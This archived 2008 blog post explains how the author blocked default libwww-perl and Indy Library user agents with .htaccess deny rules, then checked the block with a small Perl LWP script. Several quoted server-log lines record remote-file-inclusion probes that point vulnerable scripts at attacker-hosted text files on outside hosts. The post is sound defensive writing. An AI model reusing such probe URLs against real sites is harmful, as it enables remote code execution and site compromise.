Main Content

libwww-perl and Indy Library in your server logs?

Archive - Originally posted on "The Horse's Mouth" - 2008-09-13 08:28:48 - Graham Ellis

Here are some sample lines from our server logs ... and I don't like the look of them!

from 195.39.5.203 - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24


from 91.187.115.253 - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17


Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (which is also know as the "User Agent") - are very likely to be attempting to find a security hole in our site scripts, through which they can copy themselves onto our server and then continue to infect other systems, or to use our site to advertise their own by injecting their own URLs. So what are "Indy Library" and "libwww-perl"?

Indy Library usually comes from the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...

libwww is from the Perl LWP (Library for WorldWideWeb in Perl) library, so in this case, it's probable that someone has written an automated program In Perl ...

Automated programs are a necessity - and indeed we welcome well behaved crawlers from the well known Google and Yahoo through to more obscure ones too, but authors of such crawlers who know properly what they're doing change the User Agent string rather than using the default - in my experience, we really don't want the default crawlers on our site, which are at least 90% malicious, with the remaining 10% being amateur. So how can we turn them off?

Standard practise is to deny specific user agents via the robots.txt file - but chances are that the naughty bots won't respect that so we need to enforce the rule!

Here are three lines that I've added to our .htaccess file ...

SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
Deny from env=naughty_boys


Which will send out a 403 Forbidden message to the automata, telling them that they can't have the page they seek. Goodness knows what the receiveing bot will do with the error - but we can make our 403 'handler' simple, quick, secure, and light on bandwidth.

How do we test that?

Here's a simple Perl script that will declare itself as being libwww:

#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
$res = $ua->request($req);
if ($res->is_success) {
  print $res->content;
} else {
  print "Error: " . $res->status_line . "\n";
}


And when I run that, it now gives me:

-bash-3.2$ perl pg1
Error: 403 Forbidden
-bash-3.2$


If I add the line:

$ua->agent("Well House Consultants Bot");

into that program, I get a much more satisfying result back ...

-bash-3.2$ perl pg2
 
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on


Links - full source code of our test program without and with our own user agent being set.


One of the matters that I considered very carefully indeed before blocking these use agents was the possibility that I'm blocking some useful and important traffic as well as a lot of "nasties" - throwing out the baby with the bathwater if you like. Not the case, I believe - as most people who have legit babies take good care of them and name them properly, but I will be watching my log files none the less to check.

As I finished writing this article - some poetic justice from my log file ...
64.159.77.76 - - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty- programs-looking-for-security-holes-on-your- server-.html/errors.php?error= http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
Some automaton is looking to hack into a previous short article on security holes and firmly being denied access.